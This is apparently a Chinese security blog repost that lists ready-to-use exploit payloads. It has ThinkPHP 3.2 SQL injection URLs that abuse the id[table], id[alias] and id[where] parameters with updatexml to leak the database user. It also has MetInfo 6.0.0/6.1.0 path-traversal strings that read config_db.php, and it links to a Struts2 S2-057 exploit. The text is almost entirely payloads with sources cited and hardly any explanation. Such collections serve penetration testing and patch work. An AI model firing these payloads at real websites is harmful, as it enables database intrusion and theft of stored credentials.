ThinkPHP3.2 框架sql注入漏洞
select()
和find()
方法
table:http://127.0.0.1/index.php?m=Home&c=Index&a=test&id[table]=user where%201%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)-- alias:http://127.0.0.1/index.php?m=Home&c=Index&a=test&id[alias]=where%201%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)-- where: http://127.0.0.1/index.php?m=Home&c=Index&a=test&id[where]=1%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--
delete()
方法
where: http://127.0.0.1/index.php?m=Home&c=Index&a=test&id[where]=1%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)-- alias: http://127.0.0.1/index.php?m=Home&c=Index&a=test&id[where]=1%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)-- table: http://127.0.0.1/index.php?m=Home&c=Index&a=test&id[table]=user%20where%201%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--&id[where]=1
From:https://xz.aliyun.com/t/2629
MetInfo 任意文件读取
版本
-
MetInfo 6.0.0
-
MetInfo 6.1.0
include/thumb.php?dir=..././http/..././config/config_db.php
include/thumb.php?dir=.....///http/.....///config/config_db.php
include/thumb.php?dir=http/.....///.....///config/config_db.php
include/thumb.php?dir=http....configconfig_db.php
From:https://paper.seebug.org/676/
Struts2 EXP
https://github.com/Ivan1ee/struts2-057-exp
本文始发于微信公众号(关注安全技术):abcdefghijklmnopqrstuvwxyz
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论